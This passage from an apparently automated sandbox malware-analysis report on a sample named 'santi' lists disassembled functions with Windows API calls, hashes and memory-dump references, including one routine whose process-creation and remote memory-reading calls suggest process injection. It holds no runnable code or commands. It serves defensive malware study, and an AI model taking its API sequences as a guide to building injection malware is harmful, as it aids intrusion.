                                                                • Instruction Fuzzy Hash: 1B919271920259AFCF06EFA5CC91DEEB7B4BF09350F50442AF816AB2A1DB349A15CF50
                                                                Function 002E40E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00353725
                                                                • GetOpenFileNameW.COMDLG32 ref: 0035376F
                                                                  • Part of subcall function 002E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E53B1,?,?,002E61FF,?,00000000,00000001,00000000), ref: 002E662F
                                                                  • Part of subcall function 002E40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002E40C6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                • String ID: X$t39
                                                                • API String ID: 3777226403-428304074
                                                                • Opcode ID: 94275b29bf211da36af89b7e8374e7d509300c8931a0d002e71e59c194c83a2c
                                                                • Instruction ID: 7ed9831631bbc35ff45a2f33335d89baa64e4307f61a708a290920c4b8d27cce
                                                                • Opcode Fuzzy Hash: 94275b29bf211da36af89b7e8374e7d509300c8931a0d002e71e59c194c83a2c
                                                                • Instruction Fuzzy Hash: 4A21A871A201989FCF12EFD5C845BDE7BFC9F59304F404059E405AB241DBF45A898F65
                                                                Function 003034AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __getstream.LIBCMT ref: 003034FE
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00303539
                                                                • __wopenfile.LIBCMT ref: 00303549
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                • String ID: <G
                                                                • API String ID: 1820251861-2138716496
                                                                • Opcode ID: e8d2eea501d789c6418a51e0e88863f4532daddc5c8552b18a0ace295c932bb8
                                                                • Instruction ID: 0b6e4c3597add50bbb119d523125f6eb0e7b4785c729abc6a1d18dc1e300c578
                                                                • Opcode Fuzzy Hash: e8d2eea501d789c6418a51e0e88863f4532daddc5c8552b18a0ace295c932bb8
                                                                • Instruction Fuzzy Hash: 2A110670E032069BEB63BF768C6266E37A8AF05350B158925E815CF2D1EB30CA1197A1
                                                                Function 002FD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002FD28B,SwapMouseButtons,00000004,?), ref: 002FD2BC
                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002FD28B,SwapMouseButtons,00000004,?,?,?,?,002FC865), ref: 002FD2DD
                                                                • RegCloseKey.KERNELBASE(00000000,?,?,002FD28B,SwapMouseButtons,00000004,?,?,?,?,002FC865), ref: 002FD2FF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: Control Panel\Mouse
                                                                • API String ID: 3677997916-824357125
                                                                • Opcode ID: 0020b4aca23e272ed2c0edc957300839ef51736be0f820596e722f8f6f390b61
                                                                • Instruction ID: ba67a02bd6eb8a3cf3f13403887f57a2d6c960ea21d93822d765718803fcff98
                                                                • Opcode Fuzzy Hash: 0020b4aca23e272ed2c0edc957300839ef51736be0f820596e722f8f6f390b61
                                                                • Instruction Fuzzy Hash: 06115A75A2120DBFEB118F64CC84EBEBBBDEF04784F008469EA01D7120D7719E509B64
                                                                Function 00E16210 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00E169CB
                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E16A61
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E16A83
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                • String ID:
                                                                • API String ID: 2438371351-0
                                                                • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                • Instruction ID: 84d280ed681f6c6351d1768c986813fd4179b1d06eedb73a3fb88869c936dbce
                                                                • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                • Instruction Fuzzy Hash: B562FA30A146589BEB24DFA4C850BDEB376EF58304F1091A9D10DFB390E7769E81CB5A
                                                                Function 0032C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E4517: _fseek.LIBCMT ref: 002E452F
                                                                  • Part of subcall function 0032C56D: _wcscmp.LIBCMT ref: 0032C65D
                                                                  • Part of subcall function 0032C56D: _wcscmp.LIBCMT ref: 0032C670
                                                                • _free.LIBCMT ref: 0032C4DD
                                                                • _free.LIBCMT ref: 0032C4E4
                                                                • _free.LIBCMT ref: 0032C54F
                                                                  • Part of subcall function 00301C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00307A85), ref: 00301CB1
                                                                  • Part of subcall function 00301C9D: GetLastError.KERNEL32(00000000,?,00307A85), ref: 00301CC3
                                                                • _free.LIBCMT ref: 0032C557
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                • String ID:
                                                                • API String ID: 1552873950-0
                                                                • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                • Instruction ID: 41d59885d7cf1c730486c343bc42b3595294a298dadd72548541916a43a8febc
                                                                • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                • Instruction Fuzzy Hash: A75162B1914258AFDF15EF65DC81BAEBBB9EF48300F10009EF219A7281DB715A90CF59
                                                                Function 002FEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 002FEBB2
                                                                  • Part of subcall function 002E51AF: _memset.LIBCMT ref: 002E522F
                                                                  • Part of subcall function 002E51AF: _wcscpy.LIBCMT ref: 002E5283
                                                                  • Part of subcall function 002E51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 002E5293
                                                                • KillTimer.USER32(?,00000001,?,?), ref: 002FEC07
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002FEC16
                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00353C88
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                • String ID:
                                                                • API String ID: 1378193009-0
                                                                • Opcode ID: b0886b5b0422ce4dbd51c0ba79ec8c33fa08a410c9310398a871ba2b5c79e29d
                                                                • Instruction ID: 18aa2652554d4fc367dc0f6f9d09c813f61ab2556f75fa0ab6d2e27d7cf50498
                                                                • Opcode Fuzzy Hash: b0886b5b0422ce4dbd51c0ba79ec8c33fa08a410c9310398a871ba2b5c79e29d
                                                                • Instruction Fuzzy Hash: 9E2129709047849FEB338B28C859FE7FBEC9B05748F05009EE78E56291C7B42A88CB51
                                                                Function 0032C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0032C72F
                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0032C746
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Temp$FileNamePath
                                                                • String ID: aut
                                                                • API String ID: 3285503233-3010740371
                                                                • Opcode ID: ebc265cb0aa309d06216e5fd33def1af1171de5247ad2f1bba4d8ffe12792284
                                                                • Instruction ID: 579c5eb13308d519c3727e2d56f7882a17cd32e558fb3cf554d44ae16f7142ac
                                                                • Opcode Fuzzy Hash: ebc265cb0aa309d06216e5fd33def1af1171de5247ad2f1bba4d8ffe12792284
                                                                • Instruction Fuzzy Hash: DFD05E71A0030EABDB11AB90DC0EFCA776C9704704F0045A0B650E50B1DBF1E6998B54
                                                                Function 0033F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 692c465dbb015c9b4aa9eac2ec6c04e3956a57c17b2f1df838294a3d75805565
                                                                • Instruction ID: 4a0783fca8b8ec2c0f300a26e95ba0894027e9c6fed68088f4758e83026fa06e
                                                                • Opcode Fuzzy Hash: 692c465dbb015c9b4aa9eac2ec6c04e3956a57c17b2f1df838294a3d75805565
                                                                • Instruction Fuzzy Hash: 89F16971A083019FCB11DF24C585B6AF7E5BF88314F50892EF9999B292D770E905CF82
                                                                Function 0030395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __FF_MSGBANNER.LIBCMT ref: 00303973
                                                                  • Part of subcall function 003081C2: __NMSG_WRITE.LIBCMT ref: 003081E9
                                                                  • Part of subcall function 003081C2: __NMSG_WRITE.LIBCMT ref: 003081F3
                                                                • __NMSG_WRITE.LIBCMT ref: 0030397A
                                                                  • Part of subcall function 0030821F: GetModuleFileNameW.KERNEL32(00000000,003A0312,00000104,00000000,00000001,00000000), ref: 003082B1
                                                                  • Part of subcall function 0030821F: ___crtMessageBoxW.LIBCMT ref: 0030835F
                                                                  • Part of subcall function 00301145: ___crtCorExitProcess.LIBCMT ref: 0030114B
                                                                  • Part of subcall function 00301145: ExitProcess.KERNEL32 ref: 00301154
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000001,00000000,?,?,002FF507,?,0000000E), ref: 0030399F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 1372826849-0
                                                                • Opcode ID: 7311cfad74198497857319c979f583626cd1915282d8262370d6da81bd97045c
                                                                • Instruction ID: 6a3a245d6c74c458bceabfdf6f88f303470c8860fc32322010e6337af44ea560
                                                                • Opcode Fuzzy Hash: 7311cfad74198497857319c979f583626cd1915282d8262370d6da81bd97045c
                                                                • Instruction Fuzzy Hash: 8301B5353472019AE6277B39EC72B2A335C9F82760F22002AF5059F5D2DFF0DD0086A1
                                                                Function 0032C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0032C385,?,?,?,?,?,00000004), ref: 0032C6F2
                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0032C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0032C708
                                                                • CloseHandle.KERNEL32(00000000,?,0032C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0032C70F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleTime
                                                                • String ID:
                                                                • API String ID: 3397143404-0
                                                                • Opcode ID: 4ad94b720538060abc289d7250a93aff1830b6473b16d774b0e9849e8f937dba
                                                                • Instruction ID: 4b56e263b0f1c5065f0c74c5c989f7b47e10034ea01c47864f79a82b01108c65
                                                                • Opcode Fuzzy Hash: 4ad94b720538060abc289d7250a93aff1830b6473b16d774b0e9849e8f937dba
                                                                • Instruction Fuzzy Hash: 9DE08632640224BBD7221B54AC0AFCE7B1CAB06B60F108110FB54690E097F125118798
                                                                Function 0032BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 0032BB72
                                                                  • Part of subcall function 00301C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00307A85), ref: 00301CB1
                                                                  • Part of subcall function 00301C9D: GetLastError.KERNEL32(00000000,?,00307A85), ref: 00301CC3
                                                                • _free.LIBCMT ref: 0032BB83
                                                                • _free.LIBCMT ref: 0032BB95
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                • Instruction ID: 76aa0d6ef71404af82ff5dd53f0609adeb9f9f4f9aef31dde00441cfbbd513d7
                                                                • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                • Instruction Fuzzy Hash: C2E012B164275147EA25A5B97E5CEB353CC4F04351715081DB55AEB186CF24F84089A4
                                                                Function 002E2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002E24F1), ref: 002E2303
                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002E25A1
                                                                • CoInitialize.OLE32(00000000), ref: 002E2618
                                                                • CloseHandle.KERNEL32(00000000), ref: 0035503A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                • String ID:
                                                                • API String ID: 3815369404-0
                                                                • Opcode ID: 7ceb8543bc64ad5d551101c7c894aa3fd4567ebf9c69625b10666ec3a81e8041
                                                                • Instruction ID: 3693f6efe953ac7f10510ec3deaf25a92b527a0fc0f95e844abbce5341b6bfb1
                                                                • Opcode Fuzzy Hash: 7ceb8543bc64ad5d551101c7c894aa3fd4567ebf9c69625b10666ec3a81e8041
                                                                • Instruction Fuzzy Hash: 8B71AFB89112918AC717EF5BA990695BBACFB9B380F804A2ED11AC77B1CB748414CF14
                                                                Function 002E3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsThemeActive.UXTHEME ref: 002E3A73
                                                                  • Part of subcall function 00301405: __lock.LIBCMT ref: 0030140B
                                                                  • Part of subcall function 002E3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002E3AF3
                                                                  • Part of subcall function 002E3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E3B08
                                                                  • Part of subcall function 002E3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,002E3AA3,?), ref: 002E3D45
                                                                  • Part of subcall function 002E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,002E3AA3,?), ref: 002E3D57
                                                                  • Part of subcall function 002E3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,003A1148,003A1130,?,?,?,?,002E3AA3,?), ref: 002E3DC8
                                                                  • Part of subcall function 002E3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,002E3AA3,?), ref: 002E3E48
                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E3AB3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                • String ID:
                                                                • API String ID: 924797094-0
                                                                • Opcode ID: 607a3504bfe201e4bebdb7ae1ae8668e7d9081732d37855f3da40498e64aefc8
                                                                • Instruction ID: d04b707aeb3e7f19db5a183630714b52297bd1a8bdb06685d0f2e2f49cee2fef
                                                                • Opcode Fuzzy Hash: 607a3504bfe201e4bebdb7ae1ae8668e7d9081732d37855f3da40498e64aefc8
                                                                • Instruction Fuzzy Hash: CF11AC719183409BC302EF6AE80591BFBE8EB96750F01891FF585872B1DB708594CF92
                                                                Function 0030E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___lock_fhandle.LIBCMT ref: 0030EA29
                                                                • __close_nolock.LIBCMT ref: 0030EA42
                                                                  • Part of subcall function 00307BDA: __getptd_noexit.LIBCMT ref: 00307BDA
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                • String ID:
                                                                • API String ID: 1046115767-0
                                                                • Opcode ID: 94a6691fdad50f336447929f6481e4be5f323e2e0cdca3bf7c886ac6d1b2430b
                                                                • Instruction ID: ac4d166af98a7c3852192eaed39430fa96794d85d835d34f6e70c55a2d3dd0a3
                                                                • Opcode Fuzzy Hash: 94a6691fdad50f336447929f6481e4be5f323e2e0cdca3bf7c886ac6d1b2430b
                                                                • Instruction Fuzzy Hash: 5B11A172B0BA108AE713FF68D8623597A616F86331F264B40E4605F1F2CBB49C409AA1
                                                                Function 002FF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0030395C: __FF_MSGBANNER.LIBCMT ref: 00303973
                                                                  • Part of subcall function 0030395C: __NMSG_WRITE.LIBCMT ref: 0030397A
                                                                  • Part of subcall function 0030395C: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000001,00000000,?,?,002FF507,?,0000000E), ref: 0030399F
                                                                • std::exception::exception.LIBCMT ref: 002FF51E
                                                                • __CxxThrowException@8.LIBCMT ref: 002FF533
                                                                  • Part of subcall function 00306805: RaiseException.KERNEL32(?,?,0000000E,00396A30,?,?,?,002FF538,0000000E,00396A30,?,00000001), ref: 00306856
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3902256705-0
                                                                • Opcode ID: 8b053fdc7569cf1c5f58b5269928c1ddb49102942837d24dc534b2f06710c48d
                                                                • Instruction ID: dd93c43ec6b76c103da31296d72e9952c4075e59fb2d5a877593c9df68be5ff0
